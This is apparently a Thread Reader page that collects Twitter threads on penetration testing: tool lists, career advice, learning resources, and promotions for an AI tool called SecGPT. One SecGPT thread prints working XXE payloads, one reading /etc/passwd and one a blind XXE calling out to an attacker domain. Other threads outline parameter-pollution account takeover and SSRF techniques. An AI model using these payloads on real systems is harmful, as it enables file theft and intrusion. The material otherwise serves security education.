Discover and read the best of Twitter Threads about #PenTesting

Most recents (24)

10 ways to use awk for hackers! 🚀 🧵👇 Image
1️⃣ Extracting Specific Columns from a CSV File

Quickly extract email addresses and phone numbers from a huge contact list.

#DataExtraction #EthicalHacking Image
2️⃣ Filtering Lines Based on a Pattern

Filter out sensitive information like passwords from log files.

#LogAnalysis #Security Image
Read 11 tweets
🧵 (1/3) How well do you know your tools? 🔧
We have gathered a list of resources for you to explore and practice the most powerful #pentesting tools. Image
(2/3) 📚 Your next #HTB Academy lessons:
➡️ Explore the #Linux Fundamentals: bit.ly/3HpAAIu
➡️ Learn Network Enumeration with Nmap: bit.ly/44dY2kM
➡️ Metasploit Framework: bit.ly/3GoN68t
➡️ Web Requests: bit.ly/41KqOb3
(3/3) Don't forget about these #pentesting tools 🫡
➡️ Cracking Passwords with Hashcat: bit.ly/3n9CYvl
➡️ Active Directory BloodHound: bit.ly/3VcoW8P
➡️ Intro to Network Traffic Analysis: bit.ly/3HmHZHU
Read 3 tweets
40 Best PenTesting Toolkits

Information Gathering

•OSINT Framework
•Nmap
•Whois
•Recon-ng
•Wireshark
•Dnsrecon
•Google Hacking Database
•Nikto
•Dnsenum
Scanning and Enumeration

•Nmap
•Nikto
•Powershell Scripts
•Openvas
•Nessus
•Sqlninja
•OWASP ZAP
•Wp-scan
Exploitation

•Metasploit
•Sqlmap
•Mitre Att&ck
•Burp Suite
•Hydra
•Netcat
•Routersploit
•Cain and Abel
•John the Ripper
•Hashcat
Read 7 tweets
From Noob to Pentesting Clients in 2023 👇
1. Be laser focused to become l33t. Cybersecurity is a large field and you can't be an expert of everything.
2. Let's say you choose application security. Here's how I would skill up really fast.
Read 9 tweets
#cybersecurity #pentesting #hacking #DataSecurity

Cybersecurity is essential for protecting our digital lives. From personal devices to enterprise systems, cyber threats are ever-present and evolving. As technology advances, so do the tactics and techniques of cybercriminals.
One of the most important steps in securing our digital lives is to use strong, unique passwords. This means avoiding common words and phrases, & instead using a combination of letters, numbers, and symbols. It's also important to avoid reusing passwords across multiple accounts.
Another key aspect of cybersecurity is keeping software up to date. Software companies regularly release updates that include security patches and bug fixes. By keeping your software up to date, you can protect against known vulnerabilities that cybercriminals may exploit.
Read 9 tweets
HTTP Parameter Pollution @SecGPT has seen in its training. Image
1. ATO via password reset

The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account; then use the password reset link => ATO.
2. Price manipulation in e-commerce platforms

The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
Read 5 tweets
🚀🔒Exciting news! SecGPT is now LIVE!

Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.👇
1. Trained on an extensive collection of cybersecurity reports, @SecGPT provides you with a deeper understanding of vulnerabilities, exploitation techniques, and emerging trends in cybersecurity.

Its knowledge increases as more reports and writeups are published.
2. Explore SecGPT's capabilities and see how it can assist you in enhancing your cybersecurity expertise.

Try it out for free at alterai.me

#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
Read 7 tweets
I never rely on automation alone.

In a recent external pentest, I was going over the assets manually, while running some tools in the background, including nuclei.
1. One instance was running a software vulnerable to arbitrary file deletion. Nuclei didn't even smell it, unfortunately.

What I usually do, is to look over famous exploits for the specific software. And this one was a victim.
2. Another instance was running a software vulnerable to RCE. Thanks @infosec_au for the amazing work that help uncover this.

Nuclei has some templates for this, but they didn't catch it.

Similar to #1, I dug deeper manually and confirmed the vulnerabilty.
Read 4 tweets
Boost your pentesting and bug bounty game with SecGPT's AI insights from thousands of online security reports.

I've asked it for some XXE payloads found in the reports. Image
1. Basic XXE payload

`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
2. Blind XXE payload

`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
Read 7 tweets
Unlocking the Secrets: Breaking Access Controls, the basics 👇

(from the AI model I'm currently training on security reports) Image
1. Direct object reference

This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
2. Horizontal privilege escalation

This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
Read 8 tweets
Often times to simplify my work I build scripts.👇

I recently discovered katana by @pdiscoveryio. And I turned this:

katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"

into this:

kata <tld>
1. The long command does the following:

-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e. twitter.com)
-cs => scope for this regex (limited to the tld and its subdomains)
2. You can download the kata bash script from my repo below. Use it as:

kata <tld>

Do me a favor and star the repo, thanks!

#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips

github.com/CristiVlad25/s…
Read 3 tweets
As much as I love automation in recon, 98% of the findings in my pentests have nothing to do with it. Why? 👇
1. Inspired by @NahamSec recent video.

First, in a large majority of the web pentests, clients want me to focus only on their app and it's features. So, there's no need for subdomain enumeration/bruteforcing or any other large recon tactic.
2. This doesn't mean that I don't use automation. I automate some of the boring and repetitive tasks via bash and python.
Read 9 tweets
More practice, less theory (but not 0 theory)

In the past, I criticized Top 1% THM who know close to nothing about the real-world aspects of a pentest.

My point was not understood and I got a lot of hate for it. Image
1. Again, there's less value in being Top 1% if your experience is purely theoretical.

Yet, you will go way further if you complement your experience (from day-to-day work in cybersecurity) with continuous practice on THM and other platforms (focusing on non-CTFish materials).
2. If you're not working in cybersecurity yet, but you want to, no problem.

Get your daily real-world experience from VDPs (and not paid bounties).
Read 4 tweets
Grow your cybersecurity skills with this incredible collection of FREE learning resources.

⚡️ Get ready to level up!

Follow & share the 🧵

#infosec #cybersecurity #pentesting #bugbounty
#hacking #blueteam #redteam #technology #DataSecurity #CyberSec #Linux#soc #dfir
1️⃣ Hands-on cyber security training through real-world scenarios.

tryhackme.com
2️⃣ LiveOverflow YouTube channel

youtube.com/@LiveOverflow
Read 11 tweets
Looking to kickstart your career in cybersecurity?

You can do it all with FREE resources and a clear step-by-step path

Here is How 🧵

#infosec #cybersecurity #pentesting #oscp @tryhackme #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Linux
1️⃣ Level - Introduction to OpenVPN

🅰️ OpenVPN: How to Connect

-OpenVPN - Windows
-OpenVPN - Linux
-OpenVPN - MacOS

The room is free complete it.👇

tryhackme.com/room/openvpn
2️⃣ Introductory Research Walkthrough

Here you will learn

- How to research
- How to search for vulnerabilities

The room is free complete it.👇

tryhackme.com/room/introtore…
Read 11 tweets
Massive giveaway by @AppSecEngineer!

Annual PRO subscription (worth $399)

Rules to participate 👇
1. Subscribe to my free newsletter. At cristivlad.substack.com.
2. Like and retweet this post (the top post of the thread).
Read 6 tweets
SSRF via PDF? Now made easy.

(thread)
1. Go to @jonasl github and clone this repo. Can't paste the link, for some reason @twitter thinks it's malicious...
2. Copy Burp Collaborator URL to the clipboard.
Read 8 tweets
Privilege escalation in Windows using 4 tools for red teamers and pentesters.

(thread)
1. WinPEAS - it's a simple .exe script you can run as: winpeas.exe > outputfile.txt

Get it here: github.com/carlospolop/PE…
2. PrivescCheck - a powershell script

Get it here: github.com/itm4n/PrivescC…
Read 6 tweets
In this week's newsletter:

- building the next ChatGPT | Network Pentesting | Full-blown Winter -

(thread) Image
1. I'm talking about the 6 month learning plan to understand AI large language models from scratch - the stuff that #chatGPT is built on.
2. I'm also talking about the heavy workload of pentests and appsec assessments from this past week.
Read 5 tweets
Top Python Libraries used by Hackers

(thread)
1. socket: A library that provides low-level core networking services.
2. scapy: A powerful interactive packet manipulation library and tool.
Read 10 tweets
Look for these file extensions in your pentests and appsec assessments.

(thread)
1. .env - commonly used to store environment variables, including sensitive information such as passwords and tokens.
2. .yml/.yaml - commonly used in configuration files for software written in programming languages like Ruby, Python and JavaScript.
Read 13 tweets
In this week's newsletter:

- iOS Pentesting | ChatGPT my Teacher | Recon -

(thread) Image
1. How I'm using ChatGPT as a virtual teacher. And of course, how you can use it too.
2. My greatest pentesting challenge for this week.
Read 5 tweets
Squeezing the juices out of robots.txt.

A fully automated workflow that you've never seen before.

(thread)
1. This script scrapes the disallowed paths from the robots.txt files of a list of domains and saves them to a single file. It also removes any unwanted entries and sorts the file in a particular way.

Can you write it yourself? Here’s how the script should look like.
2. Create a directory called "massrobots" in the pwd. This is where you'll save all the robots.txt files for later processing.
Read 15 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!